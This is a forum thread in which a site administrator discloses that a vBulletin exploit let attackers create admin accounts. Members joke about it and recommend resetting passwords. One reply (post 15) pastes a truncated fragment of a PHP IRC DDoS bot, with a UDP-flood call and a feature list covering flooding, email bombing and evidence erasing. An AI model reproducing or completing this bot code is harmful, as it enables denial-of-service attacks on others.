We've been hacked, but it doesn't seem serious

Discussion in 'Site Issues' started by Good CO, Sep 12, 2013.

  1. Last week vBulletin, who make the forum software, announced that an exploit had been found which could give a hacker administrative access to the site (i.e. as Good / Bad CO) - basically meaning he/she could change just about anything. We patched the exploit within minutes of the notification and it initially appeared that we were in the clear, but yesterday we found that was not the case.

    It has become clear that administrator user accounts had been created on the site. At present we think that is the limit of the success of the hackers, as the administrative control area of the site has an extra layer of protection separate from any access control by vBulletin itself, thanks to my security paranoia.

    Was any damage done?

    None that we've found so far

    What information could have been accessed?

    It is possible that the attacker(s) could view user account details, one by one, and therefore have been able to see a user's email address and IP address, and with a year or so of hard graft might have managed everyone. PMs and passwords (encrypted anyway) would have remained secure. It does though appear that the hacker(s) didn't go further than the initial account creation made possible by the exploit. This is almost certainly as they couldn't get access to the administrative area, and moved on to a softer target - the vBulletin forum of some other unfortunate online community.

    I will be working through our logs this morning checking if any personal accounts have been accessed.

    So what?

    Well, not much actually. It comes under 'operational honesty' to inform everyone about this and I will put reference to this thread in the next newsletter. After further checks we can hopefully view it as just a nice nudge to do a security audit, and perhaps a pat on the back for going the extra mile in our security measures to date.
    Last edited: Sep 12, 2013
  2. They stole £5,000,000 from me, It's your fault and I want it back.
  3. janner

    janner War Hero Book Reviewer

    Me too, I'll accept a cheque.
  4. Blackrat

    Blackrat War Hero Moderator Book Reviewer

    Look. Those pictures. I went to see the Rocky Horror show ok? That's all it was.
  5. I cannot tell a lie, Janner did it.
  6. sgtpepperband

    sgtpepperband War Hero Moderator Book Reviewer

    So that's why Mongke's Fist only made £11.34, after "expenses"... :shock:
  7. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested it doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. XenForo software is light years ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
  8. sgtpepperband

    sgtpepperband War Hero Moderator Book Reviewer

  9. wal

    wal Badgeman

    I'm with you on that Sgt.
  10. Ageing_Gracefully

    Ageing_Gracefully War Hero Moderator Book Reviewer

    ARRSE seems to have gone tits-up at the mo! Tin foil anyone?
  11. Blackrat

    Blackrat War Hero Moderator Book Reviewer

    Like, whoooooooooooaa!

  12. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Website hacks nowadays tend to be more likely conducted by Cheltenham than China. It's all the rage apparently :pc:
  13. You got someone to type this in for you, didn't you?
  14. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    Sadly I learnt about vBulletin vulnerabilities through necessity rather than desire.
  15. I now have access.

    I'm now in total control of all the Cash Points in Plymouth. There's £100 waiting for the first lucky RR member to get to the TSB hole in the wall in Crownhill.


    if($_GET['act'] == 'lol'){

    udpflood4($_GET['host'], $_GET['psize'], $_GET['time'], $_GET['port']);



    /* ---------------------UniX-------------------- */

    /* UniX Bot - Coding by ANoN - This code is Very PUBLIC! */

    /* + Modded UDP Flooder */

    /* + Removed TCP Flooder */

    /* + Added email bomb */

    /* + Added join message */

    /* + Added !site command */

    /* + Added whois */

    /* + Added port scan */

    /* + Added Quick UDP Flood */

    /* + Added Colors */

    /* + Added Count Command */

    /* - Removed Host (IP Address) Auth (Its bullssss) */

    /* + Added Credits */

    /* + Added Speedtest */

    /* - Removed Useless ssss */

    /* + Cleaned the code */

    /* + Added Version */

    /* + Added New nicks */

    /* + Added Update command */

    /* + Made the update command idiot proof */

    /* + Added commands command */

    /* + Added id command */

    /* + Added uptime command */

    /* + Added evidence eraser */

    /* + Added Cell Phone Spammer */

    /* + Added Cell info */

    /* + Added change prefix */

    /* + Added install update command */

    /* + Added port 3074 DDoS */

    /* + ICMP ddoS? */

    /* + FTP ddoS? */

    /* + Added 2 Player ddos feature */

    /* + Added 3 Player ddos feature */

    /* + Added 4 Player ddos feature */


    set_time_limit( 0 );

    error_reporting( 0 );

    echo "ANoNyMoUS iZ LeGioN";

    class Mike_Unix


    var $using_encode = true;

    var $config = array(

    'nickform' => 'FraseR|%d]',

    'nickform2' => '%d]',

    'prfix' => 'NzM|%d]',

    'identp' => 'Mike',

    'modes' => '+B',

    'maxrand' => 6,

    'maxrand2' => 1,

    'maxrand3' => 2,

    'maxrand4' => 3,

    'cprefix' => '.',

    'version' => '1.0',

    'host' => '*',

    'yellow' => '12',

    'blue' => '4',

    'orange' => '9',

    'green' => '7',

    'leetprefix' => '4>>',

    'leetsuffix' => '12<<',

    'leetprefixwhite' => '0>>',

    'leetsuffixwhite' => '0<<',

    'leetsuffixred' => '4<<',

    'part1' => '0?~{ 4',

    'part2' => '0}~?',

    'hostauth' => '*'


    var $messages = array

    Last edited: Sep 12, 2013
  16. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    On a slightly more serious note & not wishing to be alarmist, whilst GCO advises passwords are encrypted, for those who wish to be security conscious, it would do you no harm to change your password.

    I have, simply to safeguard online banking data. Probably paranoia, admittedly.
  17. Password re-set done. Non-flippant head on.

  18. Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as LastPass, KeePass or RoboForm which will allow you to choose really strong ones.
  19. Ninja_Stoker

    Ninja_Stoker War Hero Moderator

    True, many of us are guilty of not changing our passwords, but in the case of a hack, it's always a good first aid measure because the only thing that protects the individual if their details have been compromised is the volume of data available to the hacker.
  20. Just asked the NSA if they got my password and they swear they didn't, but they did ask me what it was just to confirm it so I told them and it turns out they haven't got it. Glad to know I am safe with such vigilant defenders of freedom covering my back. Whew.
